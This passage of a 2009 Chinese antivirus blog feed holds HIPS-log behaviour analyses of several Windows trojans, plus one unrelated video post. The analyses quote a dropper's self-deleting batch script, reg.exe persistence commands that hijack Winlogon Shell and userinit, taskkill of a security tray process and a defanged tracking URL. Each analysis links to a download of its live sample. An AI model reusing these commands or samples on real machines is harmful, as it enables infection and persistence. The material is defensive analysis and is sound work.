使用HIPS阻止陌生程序向系统目录创建dll<br>
<br>
使用HIPS阻止程序修改LSA注册表<br>
<br>
使用HIPS阻止程序安装钩子<br>
<br>
使用HIPS阻止陌生程序调用rundll32.exe<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-906073-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/94ab123d53aee3cd9e3d626b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/94ab123d53aee3cd9e3d626b.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月29日 星期日  14:40</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/94ab123d53aee3cd9e3d626b.html</guid>
</item>

<item>
        <title><![CDATA[[行为分析] Trojan-Downloader.Win32.Agent.aifd]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/805259020ecf7c054afb516a.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Trojan-Downloader.Win32.Agent.aifd<br>
NOD32：Win32/TrojanDownloader.Agent.AIFD<br>
Rising：Trojan.DL.Win32.Mnless.bqd<br>
VT扫描时间：2009.11.29 04:38:51 (UTC)<br>
EQS Lab编号：091129327<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：52.0 KB (53,280 字节)<br>
MD5码：3DDCD8ADD507CB1AA5E42F1D924E8AE6<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向system32目录写入dll&#160;&#160;并设置隐藏属性
<div class="quote"><blockquote>2009-11-29 13:33:54&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\sinx32.dll<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.dll<br>
<br>
2009-11-29 13:34:02&#160; &#160; 修改文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:(隐藏文件)C:\WINDOWS\system32\sinx32.dll<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅱ-&gt;%systemroot%\*.dll</blockquote></div>
调用dll
<div class="quote"><blockquote>2009-11-29 13:34:15&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\rundll32.exe<br>
命令行:C:\WINDOWS\system32\sinx32.dll&#160;&#160;InsertTo&#160;&#160;*E:\KIA\1\1.exe<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\rundll32.exe</blockquote></div>
劫持winlogon.exe进程
<div class="quote"><blockquote>2009-11-29 13:34:28&#160; &#160; 修改其它进程内存&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
目标进程:C:\WINDOWS\system32\winlogon.exe<br>
触发规则:所有程序规则-&gt;进程保护-&gt;%systemroot%\system32\winlogon.exe<br>
<br>
2009-11-29 13:34:38&#160; &#160; 创建远程线程&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
目标进程:C:\WINDOWS\system32\winlogon.exe<br>
触发规则:所有程序规则-&gt;进程保护-&gt;%systemroot%\system32\winlogon.exe<br>
<br>
2009-11-29 13:34:48&#160; &#160; 加载库文件&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\winlogon.exe<br>
文件路径:C:\WINDOWS\system32\sinx32.dll<br>
触发规则:所有程序规则-&gt;*</blockquote></div>
调用 修改IE进程内存
<div class="quote"><blockquote>2009-11-29 13:34:58&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\winlogon.exe<br>
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
触发规则:所有程序规则-&gt;进程保护-&gt;C:\Program Files\Internet Explorer\IEXPLORE.exe<br>
<br>
2009-11-29 13:34:58&#160; &#160; 修改其它进程内存&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\winlogon.exe<br>
目标进程:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
触发规则:所有程序规则-&gt;进程保护-&gt;C:\Program Files\Internet Explorer\IEXPLORE.exe</blockquote></div>
安装钩子
<div class="quote"><blockquote>2009-11-29 13:35:09&#160; &#160; 安装全局钩子&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\winlogon.exe<br>
文件路径:sinx32.dll<br>
钩子类型:WH_JOURNALRECORD<br>
触发规则:应用程序规则-&gt;系统程序-&gt;%systemroot%\system32\winlogon.exe</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<span><img border="0" src="http://hiphotos.baidu.com/eqsyssecurity/pic/item/fd56c0d52be651eb50da4b3f.jpg" small="0" class="blogimg"></span><span><img border="0" src="http://hiphotos.baidu.com/eqsyssecurity/pic/item/0b7e0a00ce2b413e738b6539.jpg" small="0" class="blogimg"></span><br>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建dll<br>
<br>
调用rundll32.exe IEXPLORE.exe<br>
<br>
劫持winlogon进程<br>
<br>
安装钩子<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向系统目录创建dll<br>
<br>
使用HIPS阻止陌生程序调用rundll32.exe IEXPLORE.exe<br>
<br>
使用HIPS阻止陌生程序劫持winlogon进程<br>
<br>
使用HIPS阻止程序安装钩子<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-906072-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/805259020ecf7c054afb516a.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/805259020ecf7c054afb516a.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月29日 星期日  14:39</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/805259020ecf7c054afb516a.html</guid>
</item>

<item>
        <title><![CDATA[农夫果园水溶C100含砒霜？]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/7474fc7fe279d00229388a61.html]]></link>
        <description><![CDATA[
		
		<embed width="450" height="390" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://player.youku.com/player.php/sid/XMTM0ODUxMTIw/v.swf" wmode="window" play="true" loop="false" menu="false"></embed> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%D4%D3%CC%B8">杂谈</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/7474fc7fe279d00229388a61.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月29日 星期日  01:58</pubDate>
        <category><![CDATA[杂谈]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/7474fc7fe279d00229388a61.html</guid>
</item>

<item>
        <title><![CDATA[行为分析 魔兽盗号木马 Trojan.Win32.Generic.51EE4B13]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/3922be38dc91442997ddd891.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：-<br>
NOD32：-<br>
Rising：Trojan.Win32.Generic.51EE4B13<br>
VT扫描时间：2009.11.28 04:46:30 (UTC)<br>
EQS Lab编号：091128326<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：35.9 KB (36,784 字节)<br>
MD5码：18A7CAD19056512A0E0DD7DB9F8B6A9E<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向魔兽世界目录写入dll
<div class="quote"><blockquote>2009-11-28 12:46:50&#160; &#160; 创建文件&#160; &#160;&#160;&#160;<br>
进程路径:E:\KIA\1.exe<br>
文件路径:E:\Games\World of Warcraft\syslpk.dll<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.dll<br>
<br>
2009-11-28 12:46:56&#160; &#160; 创建文件&#160; &#160;&#160;&#160;<br>
进程路径:E:\KIA\1.exe<br>
文件路径:E:\Games\World of Warcraft\lpk.dll<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.dll<br>
<br>
2009-11-28 12:47:01&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1.exe<br>
文件路径:E:\Games\World of Warcraft\sysText.dll<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.dll</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向魔兽世界目录写入dll<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向魔兽世界目录写入dll<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-905906-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/3922be38dc91442997ddd891.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/3922be38dc91442997ddd891.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月28日 星期六  13:07</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/3922be38dc91442997ddd891.html</guid>
</item>

<item>
        <title><![CDATA[行为分析 Trojan-Downloader.Win32.Xanda.r]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/084f70645cceaafaf636544b.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Trojan-Downloader.Win32.Xanda.r<br>
NOD32：probably a variant of Win32/VB.OEA<br>
Rising：Trojan.Win32.Generic.51F06AE5<br>
VT扫描时间：2009.11.27 05:11:18 (UTC)<br>
EQS Lab编号：091127325<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：88.0 KB (90,112 字节)<br>
MD5码：2A496F7A0F1AD38EEAAB6A666ABC6A72<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向system32目录写入dll bat
<div class="quote"><blockquote>2009-11-27 13:19:05&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\system32\MySysDL32.dll<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.dll<br>
<br>
2009-11-27 13:19:14&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\system32\206.9361.bat<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.bat</blockquote></div>
BAT内容
<div class="quote"><blockquote>ping&#160;&#160;127.1<br>
copy&#160;&#160;&quot;E:\KIA\2\2.exe&quot;,&quot;C:\WINDOWS\system32\MySysDL32.exe&quot;<br>
del.exe &quot;E:\KIA\2\2.exe&quot;<br>
start &quot;&quot; &quot;C:\WINDOWS\system32\MySysDL32.exe&quot;<br>
del %0</blockquote></div>
调用BAT
<div class="quote"><blockquote>2009-11-27 13:19:34&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\system32\cmd.exe<br>
命令行:/c C:\WINDOWS\system32\206.9361.bat<br>
触发规则:高优先规则-&gt;In Side-&gt;%systemroot%\system32\cmd.exe<br>
<br>
2009-11-27 13:19:41&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\cmd.exe<br>
文件路径:C:\WINDOWS\system32\MySysDL32.exe<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.exe<br>
<br>
2009-11-27 13:19:48&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\cmd.exe<br>
文件路径:C:\WINDOWS\system32\MySysDL32.exe<br>
触发规则:所有程序规则-&gt;威胁提示Ⅰ-&gt;%systemroot%\*</blockquote></div>
以命令行添加注册表
<div class="quote"><blockquote>2009-11-27 13:20:16&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\WINDOWS\system32\reg.exe<br>
命令行:Add &quot;HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v &quot;Shell&quot; /t &quot;REG_SZ&quot; /d &quot;explorer.exe,C:\WINDOWS\system32\MySysDL32.exe&quot; /f<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\reg.exe<br>
<br>
2009-11-27 13:20:29&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\WINDOWS\system32\reg.exe<br>
命令行:Add &quot;HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A4BD931D-77A3-491F-A76D-12F8153455F0}&quot;<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\reg.exe<br>
<br>
2009-11-27 13:20:32&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\WINDOWS\system32\reg.exe<br>
命令行:Add &quot;HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu&quot; /v &quot;{871C5380-42A0-1069-A2EA-08002B30309D}&quot; /t &quot;REG_DWORD&quot; /d &quot;1&quot; /f<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\reg.exe<br>
<br>
2009-11-27 13:20:35&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\WINDOWS\system32\reg.exe<br>
命令行:Add &quot;HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel&quot; /v &quot;{871C5380-42A0-1069-A2EA-08002B30309D}&quot; /t &quot;REG_DWORD&quot; /d &quot;1&quot; /f<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\reg.exe</blockquote></div>
替换桌面IE快捷方式
<div class="quote"><blockquote>2009-11-27 13:20:35&#160; &#160; 删除文件&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk<br>
触发规则:所有程序规则-&gt;Documents and Settings-&gt;?:\Documents and Settings\*\Application Data\*<br>
<br>
2009-11-27 13:20:50&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\Documents and Settings\Administrator\桌面\Internet Explorer.lnk<br>
触发规则:所有程序规则-&gt;Documents and Settings-&gt;?:\Documents and Settings\*\桌面\*</blockquote></div>
IE快捷方式指向
<div class="quote"><blockquote>&quot;C:\Program Files\Internet Explorer\IEXPLORE.EXE&quot; hXXp://www.qnrwz.com</blockquote></div>
调用DCOM服务COM接口
<div class="quote"><blockquote>2009-11-27 13:21:08&#160; &#160; 远程调用COM对象&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
{8BC3F05E-D86B-11D0-A075-00C04FB68820}<br>
触发规则:所有程序规则-&gt;COM-&gt;{8BC3F05E-D86B-11D0-A075-00C04FB68820}</blockquote></div>
结束进程
<div class="quote"><blockquote>2009-11-27 13:21:30&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\WINDOWS\system32\taskkill.exe<br>
命令行:/f /im rstray.exe<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\taskkill.exe</blockquote></div>
调用IE
<div class="quote"><blockquote>2009-11-27 13:21:37&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\MySysDL32.exe<br>
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
命令行:&quot;hXXp://www.qnrwz.com/tongji2/count.asp?mac=-----------&amp;ver=1.0&quot;<br>
触发规则:所有程序规则-&gt;进程保护-&gt;C:\Program Files\Internet Explorer\IEXPLORE.exe</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建dll bat exe<br>
<br>
调用reg.exe cmd.exe IEXPLORE.EXE<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向系统目录创建dll bat exe<br>
<br>
使用HIPS阻止陌生程序调用reg.exe cmd.exe IEXPLORE.EXE taskkill.exe<br>
<br>
使用HIPS阻止陌生程序替换桌面IE快捷方式<br>
<br>
使用HIPS阻止陌生程序调用DCOM服务COM接口<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-905762-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/084f70645cceaafaf636544b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/084f70645cceaafaf636544b.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月27日 星期五  13:45</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/084f70645cceaafaf636544b.html</guid>
</item>

<item>
        <title><![CDATA[行为分析 a variant of Win32/Kryptik.BEK]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/0ebd9a34b5edff44241f14f1.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：-<br>
NOD32：a variant of Win32/Kryptik.BEK<br>
Rising：-<br>
VT扫描时间：2009.11.23 18:58:57 (UTC)<br>
EQS Lab编号：091126324<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：113 KB (116,496 字节)<br>
MD5码：B98D8E8AA2E00B633A981A4519D93119<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向system32写入exe
<div class="quote"><blockquote>2009-11-26 14:26:49&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\wsnpoema.exe<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.exe</blockquote></div>
修改winlogon启动项
<div class="quote"><blockquote>2009-11-26 14:26:57&#160; &#160; 修改注册表内容&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon<br>
注册表名称:userinit<br>
更改后:C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wsnpoema.exe,<br>
更改前:C:\WINDOWS\system32\userinit.exe,<br>
触发规则:所有程序规则-&gt;自动启动-&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</blockquote></div>
向drivers目录写入sys
<div class="quote"><blockquote>2009-11-26 14:27:19&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\drivers\wsnpoem.sys<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\system32\drivers\*</blockquote></div>
读取、修改winlogon进程内存
<div class="quote"><blockquote>2009-11-26 14:27:19&#160; &#160; 读取其它进程内存&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
目标进程:C:\WINDOWS\system32\winlogon.exe<br>
触发规则:所有程序规则-&gt;进程保护-&gt;%systemroot%\system32\winlogon.exe<br>
<br>
2009-11-26 14:27:39&#160; &#160; 修改其它进程内存&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
目标进程:C:\WINDOWS\system32\winlogon.exe<br>
触发规则:所有程序规则-&gt;进程保护-&gt;%systemroot%\system32\winlogon.exe</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建exe sys<br>
<br>
读取修改winlogon进程内存<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向系统目录创建exe sys<br>
<br>
使用HIPS阻止陌生程序读取修改winlogon进程内存<br>
<br>
使用HIPS阻止陌生程序修改winlogon启动项<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-905575-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/0ebd9a34b5edff44241f14f1.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/0ebd9a34b5edff44241f14f1.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月26日 星期四  14:57</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/0ebd9a34b5edff44241f14f1.html</guid>
</item>


</channel>
</rss>